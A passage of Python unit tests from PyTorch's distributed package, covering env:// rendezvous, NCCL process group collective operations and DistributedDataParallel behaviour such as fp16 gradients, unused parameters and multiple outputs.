self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
class TimeoutTest(test_c10d_common.AbstractTimeoutTest, TestCase):
@requires_nccl()
@retry_on_connect_failures
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_default_store_timeout_nccl(self):
self._test_default_store_timeout("nccl")
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() > 0, "GPUs are available, skipping test"
)
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self.num_gpus = torch.cuda.device_count()
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# allgather_base is GPU number agnostic.
        # Each rank contributes one tensor regardless of GPU count
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size), dtype=tensor.dtype).cuda(device_id)
allgather_base(output_t, tensor)
# Verification
self.assertEqual(torch.arange(self.world_size), output_t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
        # anticipate an error
with self.assertRaisesRegex(
RuntimeError,
"output tensor size must be equal to world_size times input tensor size",
):
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=tensor.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
allgather_base(output_t, tensor)
        # anticipate an error
with self.assertRaisesRegex(
RuntimeError, "output tensor must have the same type as input tensor"
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
allgather_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
        # anticipate an error
with self.assertRaisesRegex(
RuntimeError,
"input tensor must be the same size as output size times world size",
):
input_t = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=input_t.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
reduce_scatter_base(output_t, input_t)
        # anticipate an error
with self.assertRaisesRegex(
RuntimeError, "input tensor must be the same type as the outut tensor."
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
reduce_scatter_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
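        # A single process drives all GPUs in this test, so each GPU acts as a
        # "virtual rank"; virtual_world_size is the number of tensors in each
        # per-GPU input list.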
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# 0 1 2
# 0 [0..11] [1..12]
# 1 [3..14]
# 2
# 3
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# reduce_scatter_base is GPU number agnostic.
        # Each rank contributes one tensor regardless of GPU count
output_t = torch.empty([1]).cuda(device_id)
tensor = torch.arange(self.world_size, dtype=output_t.dtype).cuda(device_id)
reduce_scatter_base(output_t, tensor)
# Verification
self.assertEqual(output_t[0], self.rank * self.world_size)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
        # Make the collectives operate on
        # 1, 2, 3, 4, ..., self.num_gpus GPUs
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class DistributedDataParallelTest(
test_c10d_common.AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
torch.cuda.set_device(self.rank)
dist.init_process_group(
backend="nccl",
world_size=self.world_size,
rank=self.rank,
init_method=f"file://{self.file_name}",
)
process_group = c10d.distributed_c10d._get_default_group()
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
ddp_model = None
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
nonlocal ddp_model
ddp_model = model
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
        # First, test that enabling find_unused_parameters under these conditions
        # triggers an error when `backward` is called (because fc3 is an unused
        # parameter and will therefore be marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith(
"Expected to mark a variable ready only once.",
)
)
unused_index = 2
unused_index_str = f"Parameter at index {unused_index}"
model = ddp_model.module
for module_name, module in model.named_modules():
if module == model.fc3:
for parameter_name, _ in module.named_parameters(recurse=False):
unused_fqn = f"{module_name}.{parameter_name}"
# Only one such parameter in model.fc3, since bias=False
break
if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
unused_index_str += f" with name {unused_fqn}"
self.assertTrue(unused_index_str in str(ex))
else:
self.fail("Expected exception")
dist.barrier(process_group)
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
# is resolved.
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_debug_detail(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_debug_info(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_debug_off(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on CPU modules
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on CPU modules
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has its gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have its gradient set.
check_no_grads()
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement gradient accumulation, but
# we would like to make sure DDP does not mess with the underlying
# module. (A hedged no_sync() sketch follows this helper.)
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradient sync by stepping the wrapped module directly, so prepare_for_backward is not called
step_model(
